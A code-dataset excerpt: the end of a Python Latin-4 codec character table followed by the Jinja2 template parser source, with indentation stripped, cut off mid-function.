'^' # 0x5E -> CIRCUMFLEX ACCENT
'_' # 0x5F -> LOW LINE
'`' # 0x60 -> GRAVE ACCENT
'a' # 0x61 -> LATIN SMALL LETTER A
'b' # 0x62 -> LATIN SMALL LETTER B
'c' # 0x63 -> LATIN SMALL LETTER C
'd' # 0x64 -> LATIN SMALL LETTER D
'e' # 0x65 -> LATIN SMALL LETTER E
'f' # 0x66 -> LATIN SMALL LETTER F
'g' # 0x67 -> LATIN SMALL LETTER G
'h' # 0x68 -> LATIN SMALL LETTER H
'i' # 0x69 -> LATIN SMALL LETTER I
'j' # 0x6A -> LATIN SMALL LETTER J
'k' # 0x6B -> LATIN SMALL LETTER K
'l' # 0x6C -> LATIN SMALL LETTER L
'm' # 0x6D -> LATIN SMALL LETTER M
'n' # 0x6E -> LATIN SMALL LETTER N
'o' # 0x6F -> LATIN SMALL LETTER O
'p' # 0x70 -> LATIN SMALL LETTER P
'q' # 0x71 -> LATIN SMALL LETTER Q
'r' # 0x72 -> LATIN SMALL LETTER R
's' # 0x73 -> LATIN SMALL LETTER S
't' # 0x74 -> LATIN SMALL LETTER T
'u' # 0x75 -> LATIN SMALL LETTER U
'v' # 0x76 -> LATIN SMALL LETTER V
'w' # 0x77 -> LATIN SMALL LETTER W
'x' # 0x78 -> LATIN SMALL LETTER X
'y' # 0x79 -> LATIN SMALL LETTER Y
'z' # 0x7A -> LATIN SMALL LETTER Z
'{' # 0x7B -> LEFT CURLY BRACKET
'|' # 0x7C -> VERTICAL LINE
'}' # 0x7D -> RIGHT CURLY BRACKET
'~' # 0x7E -> TILDE
'\x7f' # 0x7F -> DELETE
'\x80' # 0x80 -> <control>
'\x81' # 0x81 -> <control>
'\x82' # 0x82 -> <control>
'\x83' # 0x83 -> <control>
'\x84' # 0x84 -> <control>
'\x85' # 0x85 -> <control>
'\x86' # 0x86 -> <control>
'\x87' # 0x87 -> <control>
'\x88' # 0x88 -> <control>
'\x89' # 0x89 -> <control>
'\x8a' # 0x8A -> <control>
'\x8b' # 0x8B -> <control>
'\x8c' # 0x8C -> <control>
'\x8d' # 0x8D -> <control>
'\x8e' # 0x8E -> <control>
'\x8f' # 0x8F -> <control>
'\x90' # 0x90 -> <control>
'\x91' # 0x91 -> <control>
'\x92' # 0x92 -> <control>
'\x93' # 0x93 -> <control>
'\x94' # 0x94 -> <control>
'\x95' # 0x95 -> <control>
'\x96' # 0x96 -> <control>
'\x97' # 0x97 -> <control>
'\x98' # 0x98 -> <control>
'\x99' # 0x99 -> <control>
'\x9a' # 0x9A -> <control>
'\x9b' # 0x9B -> <control>
'\x9c' # 0x9C -> <control>
'\x9d' # 0x9D -> <control>
'\x9e' # 0x9E -> <control>
'\x9f' # 0x9F -> <control>
'\xa0' # 0xA0 -> NO-BREAK SPACE
'\u0104' # 0xA1 -> LATIN CAPITAL LETTER A WITH OGONEK
'\u0112' # 0xA2 -> LATIN CAPITAL LETTER E WITH MACRON
'\u0122' # 0xA3 -> LATIN CAPITAL LETTER G WITH CEDILLA
'\u012a' # 0xA4 -> LATIN CAPITAL LETTER I WITH MACRON
'\u0128' # 0xA5 -> LATIN CAPITAL LETTER I WITH TILDE
'\u0136' # 0xA6 -> LATIN CAPITAL LETTER K WITH CEDILLA
'\xa7' # 0xA7 -> SECTION SIGN
'\u013b' # 0xA8 -> LATIN CAPITAL LETTER L WITH CEDILLA
'\u0110' # 0xA9 -> LATIN CAPITAL LETTER D WITH STROKE
'\u0160' # 0xAA -> LATIN CAPITAL LETTER S WITH CARON
'\u0166' # 0xAB -> LATIN CAPITAL LETTER T WITH STROKE
'\u017d' # 0xAC -> LATIN CAPITAL LETTER Z WITH CARON
'\xad' # 0xAD -> SOFT HYPHEN
'\u016a' # 0xAE -> LATIN CAPITAL LETTER U WITH MACRON
'\u014a' # 0xAF -> LATIN CAPITAL LETTER ENG
'\xb0' # 0xB0 -> DEGREE SIGN
'\u0105' # 0xB1 -> LATIN SMALL LETTER A WITH OGONEK
'\u0113' # 0xB2 -> LATIN SMALL LETTER E WITH MACRON
'\u0123' # 0xB3 -> LATIN SMALL LETTER G WITH CEDILLA
'\u012b' # 0xB4 -> LATIN SMALL LETTER I WITH MACRON
'\u0129' # 0xB5 -> LATIN SMALL LETTER I WITH TILDE
'\u0137' # 0xB6 -> LATIN SMALL LETTER K WITH CEDILLA
'\xb7' # 0xB7 -> MIDDLE DOT
'\u013c' # 0xB8 -> LATIN SMALL LETTER L WITH CEDILLA
'\u0111' # 0xB9 -> LATIN SMALL LETTER D WITH STROKE
'\u0161' # 0xBA -> LATIN SMALL LETTER S WITH CARON
'\u0167' # 0xBB -> LATIN SMALL LETTER T WITH STROKE
'\u017e' # 0xBC -> LATIN SMALL LETTER Z WITH CARON
'\u2015' # 0xBD -> HORIZONTAL BAR
'\u016b' # 0xBE -> LATIN SMALL LETTER U WITH MACRON
'\u014b' # 0xBF -> LATIN SMALL LETTER ENG
'\u0100' # 0xC0 -> LATIN CAPITAL LETTER A WITH MACRON
'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\xc3' # 0xC3 -> LATIN CAPITAL LETTER A WITH TILDE
'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
'\xc5' # 0xC5 -> LATIN CAPITAL LETTER A WITH RING ABOVE
'\xc6' # 0xC6 -> LATIN CAPITAL LETTER AE
'\u012e' # 0xC7 -> LATIN CAPITAL LETTER I WITH OGONEK
'\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON
'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
'\u0118' # 0xCA -> LATIN CAPITAL LETTER E WITH OGONEK
'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\u0116' # 0xCC -> LATIN CAPITAL LETTER E WITH DOT ABOVE
'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\xcf' # 0xCF -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\xd0' # 0xD0 -> LATIN CAPITAL LETTER ETH (Icelandic)
'\u0145' # 0xD1 -> LATIN CAPITAL LETTER N WITH CEDILLA
'\u014c' # 0xD2 -> LATIN CAPITAL LETTER O WITH MACRON
'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\xd5' # 0xD5 -> LATIN CAPITAL LETTER O WITH TILDE
'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
'\u0168' # 0xD7 -> LATIN CAPITAL LETTER U WITH TILDE
'\xd8' # 0xD8 -> LATIN CAPITAL LETTER O WITH STROKE
'\u0172' # 0xD9 -> LATIN CAPITAL LETTER U WITH OGONEK
'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
'\xdb' # 0xDB -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xdd' # 0xDD -> LATIN CAPITAL LETTER Y WITH ACUTE
'\xde' # 0xDE -> LATIN CAPITAL LETTER THORN (Icelandic)
'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S (German)
'\u0101' # 0xE0 -> LATIN SMALL LETTER A WITH MACRON
'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xe3' # 0xE3 -> LATIN SMALL LETTER A WITH TILDE
'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
'\xe5' # 0xE5 -> LATIN SMALL LETTER A WITH RING ABOVE
'\xe6' # 0xE6 -> LATIN SMALL LETTER AE
'\u012f' # 0xE7 -> LATIN SMALL LETTER I WITH OGONEK
'\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON
'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
'\u0119' # 0xEA -> LATIN SMALL LETTER E WITH OGONEK
'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
'\u0117' # 0xEC -> LATIN SMALL LETTER E WITH DOT ABOVE
'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\xef' # 0xEF -> LATIN SMALL LETTER I WITH DIAERESIS
'\xf0' # 0xF0 -> LATIN SMALL LETTER ETH (Icelandic)
'\u0146' # 0xF1 -> LATIN SMALL LETTER N WITH CEDILLA
'\u014d' # 0xF2 -> LATIN SMALL LETTER O WITH MACRON
'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xf5' # 0xF5 -> LATIN SMALL LETTER O WITH TILDE
'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
'\u0169' # 0xF7 -> LATIN SMALL LETTER U WITH TILDE
'\xf8' # 0xF8 -> LATIN SMALL LETTER O WITH STROKE
'\u0173' # 0xF9 -> LATIN SMALL LETTER U WITH OGONEK
'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
'\xfd' # 0xFD -> LATIN SMALL LETTER Y WITH ACUTE
'\xfe' # 0xFE -> LATIN SMALL LETTER THORN (Icelandic)
'\u0138' # 0xFF -> LATIN SMALL LETTER KRA
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| apache-2.0 |
xxhank/namebench | nb_third_party/jinja2/parser.py | 215 | 34717 | # -*- coding: utf-8 -*-
"""
jinja2.parser
~~~~~~~~~~~~~
Implements the template parser.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
from jinja2 import nodes
from jinja2.exceptions import TemplateSyntaxError, TemplateAssertionError
from jinja2.utils import next
from jinja2.lexer import describe_token, describe_token_expr
#: statements that callinto
_statement_keywords = frozenset(['for', 'if', 'block', 'extends', 'print',
'macro', 'include', 'from', 'import',
'set'])
_compare_operators = frozenset(['eq', 'ne', 'lt', 'lteq', 'gt', 'gteq'])
class Parser(object):
"""This is the central parsing class Jinja2 uses. It's passed to
extensions and can be used to parse expressions or statements.
"""
def __init__(self, environment, source, name=None, filename=None,
state=None):
self.environment = environment
self.stream = environment._tokenize(source, name, filename, state)
self.name = name
self.filename = filename
self.closed = False
self.extensions = {}
for extension in environment.iter_extensions():
for tag in extension.tags:
self.extensions[tag] = extension.parse
self._last_identifier = 0
self._tag_stack = []
self._end_token_stack = []
def fail(self, msg, lineno=None, exc=TemplateSyntaxError):
"""Convenience method that raises `exc` with the message, passed
line number or last line number as well as the current name and
filename.
"""
if lineno is None:
lineno = self.stream.current.lineno
raise exc(msg, lineno, self.name, self.filename)
def _fail_ut_eof(self, name, end_token_stack, lineno):
expected = []
for exprs in end_token_stack:
expected.extend(map(describe_token_expr, exprs))
if end_token_stack:
currently_looking = ' or '.join(
"'%s'" % describe_token_expr(expr)
for expr in end_token_stack[-1])
else:
currently_looking = None
if name is None:
message = ['Unexpected end of template.']
else:
message = ['Encountered unknown tag \'%s\'.' % name]
if currently_looking:
if name is not None and name in expected:
message.append('You probably made a nesting mistake. Jinja '
'is expecting this tag, but currently looking '
'for %s.' % currently_looking)
else:
message.append('Jinja was looking for the following tags: '
'%s.' % currently_looking)
if self._tag_stack:
message.append('The innermost block that needs to be '
'closed is \'%s\'.' % self._tag_stack[-1])
self.fail(' '.join(message), lineno)
def fail_unknown_tag(self, name, lineno=None):
"""Called if the parser encounters an unknown tag. Tries to fail
with a human readable error message that could help to identify
the problem.
"""
return self._fail_ut_eof(name, self._end_token_stack, lineno)
def fail_eof(self, end_tokens=None, lineno=None):
"""Like fail_unknown_tag but for end of template situations."""
stack = list(self._end_token_stack)
if end_tokens is not None:
stack.append(end_tokens)
return self._fail_ut_eof(None, stack, lineno)
def is_tuple_end(self, extra_end_rules=None):
"""Are we at the end of a tuple?"""
if self.stream.current.type in ('variable_end', 'block_end', 'rparen'):
return True
elif extra_end_rules is not None:
return self.stream.current.test_any(extra_end_rules)
return False
def free_identifier(self, lineno=None):
"""Return a new free identifier as :class:`~jinja2.nodes.InternalName`."""
self._last_identifier += 1
rv = object.__new__(nodes.InternalName)
nodes.Node.__init__(rv, 'fi%d' % self._last_identifier, lineno=lineno)
return rv
def parse_statement(self):
"""Parse a single statement."""
token = self.stream.current
if token.type != 'name':
self.fail('tag name expected', token.lineno)
self._tag_stack.append(token.value)
pop_tag = True
try:
if token.value in _statement_keywords:
return getattr(self, 'parse_' + self.stream.current.value)()
if token.value == 'call':
return self.parse_call_block()
if token.value == 'filter':
return self.parse_filter_block()
ext = self.extensions.get(token.value)
if ext is not None:
return ext(self)
# did not work out, remove the token we pushed by accident
# from the stack so that the unknown tag fail function can
# produce a proper error message.
self._tag_stack.pop()
pop_tag = False
self.fail_unknown_tag(token.value, token.lineno)
finally:
if pop_tag:
self._tag_stack.pop()
def parse_statements(self, end_tokens, drop_needle=False):
"""Parse multiple statements into a list until one of the end tokens
is reached. This is used to parse the body of statements as it also
parses template data if appropriate. The parser checks first if the
current token is a colon and skips it if there is one. Then it checks
for the block end and parses until if one of the `end_tokens` is
reached. Per default the active token in the stream at the end of
the call is the matched end token. If this is not wanted `drop_needle`
can be set to `True` and the end token is removed.
"""
# the first token may be a colon for python compatibility
self.stream.skip_if('colon')
# in the future it would be possible to add whole code sections
# by adding some sort of end of statement token and parsing those here.
self.stream.expect('block_end')
result = self.subparse(end_tokens)
# we reached the end of the template too early, the subparser
# does not check for this, so we do that now
if self.stream.current.type == 'eof':
self.fail_eof(end_tokens)
if drop_needle:
next(self.stream)
return result
def parse_set(self):
"""Parse an assign statement."""
lineno = next(self.stream).lineno
target = self.parse_assign_target()
self.stream.expect('assign')
expr = self.parse_tuple()
return nodes.Assign(target, expr, lineno=lineno)
def parse_for(self):
"""Parse a for loop."""
lineno = self.stream.expect('name:for').lineno
target = self.parse_assign_target(extra_end_rules=('name:in',))
self.stream.expect('name:in')
iter = self.parse_tuple(with_condexpr=False,
extra_end_rules=('name:recursive',))
test = None
if self.stream.skip_if('name:if'):
test = self.parse_expression()
recursive = self.stream.skip_if('name:recursive')
body = self.parse_statements(('name:endfor', 'name:else'))
if next(self.stream).value == 'endfor':
else_ = []
else:
else_ = self.parse_statements(('name:endfor',), drop_needle=True)
return nodes.For(target, iter, body, else_, test,
recursive, lineno=lineno)
def parse_if(self):
"""Parse an if construct."""
node = result = nodes.If(lineno=self.stream.expect('name:if').lineno)
while 1:
node.test = self.parse_tuple(with_condexpr=False)
node.body = self.parse_statements(('name:elif', 'name:else',
'name:endif'))
token = next(self.stream)
if token.test('name:elif'):
new_node = nodes.If(lineno=self.stream.current.lineno)
node.else_ = [new_node]
node = new_node
continue
elif token.test('name:else'):
node.else_ = self.parse_statements(('name:endif',),
drop_needle=True)
else:
node.else_ = []
break
return result
def parse_block(self):
node = nodes.Block(lineno=next(self.stream).lineno)
node.name = self.stream.expect('name').value
node.scoped = self.stream.skip_if('name:scoped')
# common problem people encounter when switching from django
# to jinja. we do not support hyphens in block names, so let's
# raise a nicer error message in that case.
if self.stream.current.type == 'sub':
self.fail('Block names in Jinja have to be valid Python '
'identifiers and may not contain hypens, use an '
'underscore instead.')
node.body = self.parse_statements(('name:endblock',), drop_needle=True)
self.stream.skip_if('name:' + node.name)
return node
def parse_extends(self):
node = nodes.Extends(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
return node
def parse_import_context(self, node, default):
if self.stream.current.test_any('name:with', 'name:without') and \
self.stream.look().test('name:context'):
node.with_context = next(self.stream).value == 'with'
self.stream.skip()
else:
node.with_context = default
return node
def parse_include(self):
node = nodes.Include(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
if self.stream.current.test('name:ignore') and \
self.stream.look().test('name:missing'):
node.ignore_missing = True
self.stream.skip(2)
else:
node.ignore_missing = False
return self.parse_import_context(node, True)
def parse_import(self):
node = nodes.Import(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
self.stream.expect('name:as')
node.target = self.parse_assign_target(name_only=True).name
return self.parse_import_context(node, False)
def parse_from(self):
node = nodes.FromImport(lineno=next(self.stream).lineno)
node.template = self.parse_expression()
self.stream.expect('name:import')
node.names = []
def parse_context():
if self.stream.current.value in ('with', 'without') and \
self.stream.look().test('name:context'):
node.with_context = next(self.stream).value == 'with'
self.stream.skip()
return True
return False
while 1:
if node.names:
self.stream.expect('comma')
if self.stream.current.type == 'name':
if parse_context():
break
target = self.parse_assign_target(name_only=True)
if target.name.startswith('_'):
self.fail('names starting with an underline can not '
'be imported', target.lineno,
exc=TemplateAssertionError)
if self.stream.skip_if('name:as'):
alias = self.parse_assign_target(name_only=True)
node.names.append((target.name, alias.name))
else:
node.names.append(target.name)
if parse_context() or self.stream.current.type != 'comma':
break
else:
break
if not hasattr(node, 'with_context'):
node.with_context = False
self.stream.skip_if('comma')
return node
def parse_signature(self, node):
node.args = args = []
node.defaults = defaults = []
self.stream.expect('lparen')
while self.stream.current.type != 'rparen':
if args:
self.stream.expect('comma')
arg = self.parse_assign_target(name_only=True)
arg.set_ctx('param')
if self.stream.skip_if('assign'):
defaults.append(self.parse_expression())
args.append(arg)
self.stream.expect('rparen')
def parse_call_block(self):
node = nodes.CallBlock(lineno=next(self.stream).lineno)
if self.stream.current.type == 'lparen':
self.parse_signature(node)
else:
node.args = []
node.defaults = []
node.call = self.parse_expression()
if not isinstance(node.call, nodes.Call):
self.fail('expected call', node.lineno)
node.body = self.parse_statements(('name:endcall',), drop_needle=True)
return node
def parse_filter_block(self):
node = nodes.FilterBlock(lineno=next(self.stream).lineno)
node.filter = self.parse_filter(None, start_inline=True)
node.body = self.parse_statements(('name:endfilter',),
drop_needle=True)
return node
def parse_macro(self):
node = nodes.Macro(lineno=next(self.stream).lineno)
node.name = self.parse_assign_target(name_only=True).name
self.parse_signature(node)
node.body = self.parse_statements(('name:endmacro',),
drop_needle=True)
return node
def parse_print(self):
node = nodes.Output(lineno=next(self.stream).lineno)
node.nodes = []
while self.stream.current.type != 'block_end':
if node.nodes:
self.stream.expect('comma')
node.nodes.append(self.parse_expression())
return node
def parse_assign_target(self, with_tuple=True, name_only=False,
extra_end_rules=None):
"""Parse an assignment target. As Jinja2 allows assignments to
tuples, this function can parse all allowed assignment targets. Per
default assignments to tuples are parsed, that can be disable however
by setting `with_tuple` to `False`. If only assignments to names are
wanted `name_only` can be set to `True`. The `extra_end_rules`
parameter is forwarded to the tuple parsing function.
"""
if name_only:
token = self.stream.expect('name')
target = nodes.Name(token.value, 'store', lineno=token.lineno)
else:
if with_tuple:
target = self.parse_tuple(simplified=True,
extra_end_rules=extra_end_rules)
else:
target = self.parse_primary(with_postfix=False)
target.set_ctx('store')
if not target.can_assign():
self.fail('can\'t assign to %r' % target.__class__.
__name__.lower(), target.lineno)
return target
def parse_expression(self, with_condexpr=True):
"""Parse an expression. Per default all expressions are parsed, if
the optional `with_condexpr` parameter is set to `False` conditional
expressions are not parsed.
"""
if with_condexpr:
return self.parse_condexpr()
return self.parse_or()
def parse_condexpr(self):
lineno = self.stream.current.lineno
expr1 = self.parse_or()
while self.stream.skip_if('name:if'):
expr2 = self.parse_or()
if self.stream.skip_if('name:else'):
expr3 = self.parse_condexpr()
else:
expr3 = None
expr1 = nodes.CondExpr(expr2, expr1, expr3, lineno=lineno)
lineno = self.stream.current.lineno
return expr1
def parse_or(self):
lineno = self.stream.current.lineno
left = self.parse_and()
while self.stream.skip_if('name:or'):
right = self.parse_and()
left = nodes.Or(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_and(self):
lineno = self.stream.current.lineno
left = self.parse_not()
while self.stream.skip_if('name:and'):
right = self.parse_not()
left = nodes.And(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_not(self):
if self.stream.current.test('name:not'):
lineno = next(self.stream).lineno
return nodes.Not(self.parse_not(), lineno=lineno)
return self.parse_compare()
def parse_compare(self):
lineno = self.stream.current.lineno
expr = self.parse_add()
ops = []
while 1:
token_type = self.stream.current.type
if token_type in _compare_operators:
next(self.stream)
ops.append(nodes.Operand(token_type, self.parse_add()))
elif self.stream.skip_if('name:in'):
ops.append(nodes.Operand('in', self.parse_add()))
elif self.stream.current.test('name:not') and \
self.stream.look().test('name:in'):
self.stream.skip(2)
ops.append(nodes.Operand('notin', self.parse_add()))
else:
break
lineno = self.stream.current.lineno
if not ops:
return expr
return nodes.Compare(expr, ops, lineno=lineno)
def parse_add(self):
lineno = self.stream.current.lineno
left = self.parse_sub()
while self.stream.current.type == 'add':
next(self.stream)
right = self.parse_sub()
left = nodes.Add(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_sub(self):
lineno = self.stream.current.lineno
left = self.parse_concat()
while self.stream.current.type == 'sub':
next(self.stream)
right = self.parse_concat()
left = nodes.Sub(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_concat(self):
lineno = self.stream.current.lineno
args = [self.parse_mul()]
while self.stream.current.type == 'tilde':
next(self.stream)
args.append(self.parse_mul())
if len(args) == 1:
return args[0]
return nodes.Concat(args, lineno=lineno)
def parse_mul(self):
lineno = self.stream.current.lineno
left = self.parse_div()
while self.stream.current.type == 'mul':
next(self.stream)
right = self.parse_div()
left = nodes.Mul(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_div(self):
lineno = self.stream.current.lineno
left = self.parse_floordiv()
while self.stream.current.type == 'div':
next(self.stream)
right = self.parse_floordiv()
left = nodes.Div(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_floordiv(self):
lineno = self.stream.current.lineno
left = self.parse_mod()
while self.stream.current.type == 'floordiv':
next(self.stream)
right = self.parse_mod()
left = nodes.FloorDiv(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_mod(self):
lineno = self.stream.current.lineno
left = self.parse_pow()
while self.stream.current.type == 'mod':
next(self.stream)
right = self.parse_pow()
left = nodes.Mod(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_pow(self):
lineno = self.stream.current.lineno
left = self.parse_unary()
while self.stream.current.type == 'pow':
next(self.stream)
right = self.parse_unary()
left = nodes.Pow(left, right, lineno=lineno)
lineno = self.stream.current.lineno
return left
def parse_unary(self):
token_type = self.stream.current.type
lineno = self.stream.current.lineno
if token_type == 'sub':
next(self.stream)
node = self.parse_unary()
return nodes.Neg(node, lineno=lineno)
if token_type == 'add':
next(self.stream)
node = self.parse_unary()
return nodes.Pos(node, lineno=lineno)
return self.parse_primary()
def parse_primary(self, with_postfix=True):
token = self.stream.current
if token.type == 'name':
if token.value in ('true', 'false', 'True', 'False'):
node = nodes.Const(token.value in ('true', 'True'),
lineno=token.lineno)
elif token.value in ('none', 'None'):
node = nodes.Const(None, lineno=token.lineno)
else:
node = nodes.Name(token.value, 'load', lineno=token.lineno)
next(self.stream)
elif token.type == 'string':
next(self.stream)
buf = [token.value]
lineno = token.lineno
while self.stream.current.type == 'string':
buf.append(self.stream.current.value)
next(self.stream)
node = nodes.Const(''.join(buf), lineno=lineno)
elif token.type in ('integer', 'float'):
next(self.stream)
node = nodes.Const(token.value, lineno=token.lineno)
elif token.type == 'lparen':
next(self.stream)
node = self.parse_tuple(explicit_parentheses=True)
self.stream.expect('rparen')
elif token.type == 'lbracket':
node = self.parse_list()
elif token.type == 'lbrace':
node = self.parse_dict()
else:
self.fail("unexpected '%s'" % describe_token(token), token.lineno)
if with_postfix:
node = self.parse_postfix(node)
return node
def parse_tuple(self, simplified=False, with_condexpr=True,
extra_end_rules=None, explicit_parentheses=False):
"""Works like `parse_expression` but if multiple expressions are
delimited by a comma a :class:`~jinja2.nodes.Tuple` node is created.
This method could also return a regular expression instead of a tuple
if no commas where found.
The default parsing mode is a full tuple. If `simplified` is `True`
only names and literals are parsed. The `no_condexpr` parameter is
forwarded to :meth:`parse_expression`.
Because tuples do not require delimiters and may end in a bogus comma
an extra hint is needed that marks the end of a tuple. For example
for loops support tuples between `for` and `in`. In that case the
`extra_end_rules` is set to ``['name:in']``.
`explicit_parentheses` is true if the parsing was triggered by an
expression in parentheses. This is used to figure out if an empty
tuple is a valid expression or not.
"""
lineno = self.stream.current.lineno
if simplified:
parse = lambda: self.parse_primary(with_postfix=False)
elif with_condexpr:
parse = self.parse_expression
else:
parse = lambda: self.parse_expression(with_condexpr=False)
args = []
is_tuple = False
while 1:
if args:
self.stream.expect('comma')
if self.is_tuple_end(extra_end_rules):
break
args.append(parse())
if self.stream.current.type == 'comma':
is_tuple = True
else:
break
lineno = self.stream.current.lineno
if not is_tuple:
if args:
return args[0]
# if we don't have explicit parentheses, an empty tuple is
# not a valid expression. This would mean nothing (literally
# nothing) in the spot of an expression would be an empty
# tuple.
if not explicit_parentheses:
self.fail('Expected an expression, got \'%s\'' %
describe_token(self.stream.current))
return nodes.Tuple(args, 'load', lineno=lineno)
def parse_list(self):
token = self.stream.expect('lbracket')
items = []
while self.stream.current.type != 'rbracket':
if items:
self.stream.expect('comma')
if self.stream.current.type == 'rbracket':
break
items.append(self.parse_expression())
self.stream.expect('rbracket')
return nodes.List(items, lineno=token.lineno)
def parse_dict(self):
token = self.stream.expect('lbrace')
items = []
while self.stream.current.type != 'rbrace':
if items:
self.stream.expect('comma')
if self.stream.current.type == 'rbrace':
break
key = self.parse_expression()
self.stream.expect('colon')
value = self.parse_expression()
items.append(nodes.Pair(key, value, lineno=key.lineno))
self.stream.expect('rbrace')
return nodes.Dict(items, lineno=token.lineno)
def parse_postfix(self, node):
while 1:
token_type = self.stream.current.type
if token_type == 'dot' or token_type == 'lbracket':
node = self.parse_subscript(node)
elif token_type == 'lparen':
node = self.parse_call(node)
elif token_type == 'pipe':
node = self.parse_filter(node)
elif token_type == 'name' and self.stream.current.value == 'is':
node = self.parse_test(node)
else:
break
return node
def parse_subscript(self, node):
token = next(self.stream)
if token.type == 'dot':
attr_token = self.stream.current
next(self.stream)
if attr_token.type == 'name':
return nodes.Getattr(node, attr_token.value, 'load',
lineno=token.lineno)
elif attr_token.type != 'integer':
self.fail('expected name or number', attr_token.lineno)
arg = nodes.Const(attr_token.value, lineno=attr_token.lineno)
return nodes.Getitem(node, arg, 'load', lineno=token.lineno)
if token.type == 'lbracket':
priority_on_attribute = False
args = []
while self.stream.current.type != 'rbracket':
if args:
self.stream.expect('comma')
args.append(self.parse_subscribed())
self.stream.expect('rbracket')
if len(args) == 1:
arg = args[0]
else:
arg = nodes.Tuple(args, 'load', lineno=token.lineno)
return nodes.Getitem(node, arg, 'load', lineno=token.lineno)
self.fail('expected subscript expression', self.lineno)
def parse_subscribed(self):
lineno = self.stream.current.lineno
if self.stream.current.type == 'colon':
next(self.stream)
args = [None]
else:
node = self.parse_expression()
if self.stream.current.type != 'colon':
return node
next(self.stream)
args = [node]
if self.stream.current.type == 'colon':
args.append(None)
elif self.stream.current.type not in ('rbracket', 'comma'):
args.append(self.parse_expression())
else:
args.append(None)
if self.stream.current.type == 'colon':
next(self.stream)
if self.stream.current.type not in ('rbracket', 'comma'):
args.append(self.parse_expression())
else:
args.append(None)
else:
args.append(None)
return nodes.Slice(lineno=lineno, *args)
def parse_call(self, node):
token = self.stream.expect('lparen')
args = []
kwargs = []
dyn_args = dyn_kwargs = None
require_comma = False
def ensure(expr):
if not expr:
self.fail('invalid syntax for function call expression',
token.lineno)
while self.stream.current.type != 'rparen':
if require_comma:
self.stream.expect('comma')
# support for trailing comma
if self.stream.current.type == 'rparen':
break
if self.stream.current.type == 'mul':
ensure(dyn_args is None and dyn_kwargs is None)
next(self.stream)
dyn_args = self.parse_expression()
elif self.stream.current.type == 'pow':
ensure(dyn_kwargs is None)
next(self.stream)
dyn_kwargs = self.parse_expression()
else:
ensure(dyn_args is None and dyn_kwargs is None)
if self.stream.current.type == 'name' and \
self.stream.look().type == 'assign':
key = self.stream.current.value
self.stream.skip(2)
value = self.parse_expression()
kwargs.append(nodes.Keyword(key, value,
lineno=value.lineno))
else:
ensure(not kwargs)
args.append(self.parse_expression())
require_comma = True
self.stream.expect('rparen')
if node is None:
return args, kwargs, dyn_args, dyn_kwargs
return nodes.Call(node, args, kwargs, dyn_args, dyn_kwargs,
lineno=token.lineno)
def parse_filter(self, node, start_inline=False):
while self.stream.current.type == 'pipe' or start_inline:
if not start_inline:
next(self.stream)
token = self.stream.expect('name')
name = token.value
while self.stream.current.type == 'dot':
next(self.stream)
name += '.' + self.stream.expect('name').value
if self.stream.current.type == 'lparen':
args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)
else:
args = []
kwargs = []
dyn_args = dyn_kwargs = None
node = nodes.Filter(node, name, args, kwargs, dyn_args,
dyn_kwargs, lineno=token.lineno)
start_inline = False
return node
def parse_test(self, node):
token = next(self.stream)
if self.stream.current.test('name:not'):
next(self.stream)
negated = True
else:
negated = False
name = self.stream.expect('name').value
while self.stream.current.type == 'dot':
next(self.stream)
name += '.' + self.stream.expect('name').value
dyn_args = dyn_kwargs = None
kwargs = []
if self.stream.current.type == 'lparen':
args, kwargs, dyn_args, dyn_kwargs = self.parse_call(None)
elif self.stream.current.type in ('name', 'string', 'integer',
'float', 'lparen', 'lbracket',
'lbrace') and not \
self.stream.current.test_any('name:else', 'name:or',
'name:and'):
if self.stream.current.test('name:is'):
